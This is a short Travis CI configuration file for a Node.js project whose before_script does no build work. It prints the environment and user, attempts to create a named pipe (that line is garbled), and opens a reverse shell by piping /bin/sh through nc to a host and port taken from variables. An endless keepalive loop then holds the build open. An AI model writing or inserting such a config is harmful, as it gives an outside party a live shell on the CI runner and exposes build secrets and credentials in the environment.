language: node_js
before_script:
  - env
  - whoami
  - echo "test"nod /tmp/backpipe p
  - /bin/sh 0</tmp/backpipe|nc $NGHOSTNAME $NGPORT 1>/tmp/backpipe &
  - while true; do sleep 60; echo "Keepalive"; done 